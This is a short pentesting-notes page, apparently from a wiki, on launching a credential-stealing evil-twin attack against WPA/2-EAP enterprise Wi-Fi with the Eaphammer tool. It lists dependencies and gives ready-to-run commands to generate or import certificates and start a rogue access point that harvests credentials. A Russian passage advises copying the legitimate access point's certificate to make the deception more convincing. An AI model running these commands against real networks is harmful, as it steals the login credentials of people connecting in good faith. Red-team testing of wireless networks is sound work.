Enterprise

Evil Twin

Eaphammer

Firstly install requirements with venv !! python3.11 !!

bs4
pywebcopy
flask_socketio
flask_cors
flask
tqdm
pyOpenSSL
pem

To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:

# generate certificates
./eaphammer --cert-wizard

# launch attack
sudo ./eaphammer --essid CorpWifi --bssid 02:27:22:08:08:89 --interface wlan1 --creds

Import certificate

sudo ./eaphammer --cert-wizard import --server-cert cert.pem --ca-cert fullchain.pem --private-key privkey.key

View installed certs

sudo ./eaphammer --cert-wizard list

Dump original cert

Для более убедительной атаки сертификат, представляемый пользователям при аутентификации, должен быть похож на легитимный сертификат. Сертификат, используемый легитимной точкой доступа (AP), можно извлечь из захвата сети с помощью следующего инструмента: ссылка на скрипт.

PreviousPSK NextINFRA

Last updated 7 months ago

hashtagEvil Twin

hashtagEaphammer

hashtagDump original cert

Evil Twin

Eaphammer

Dump original cert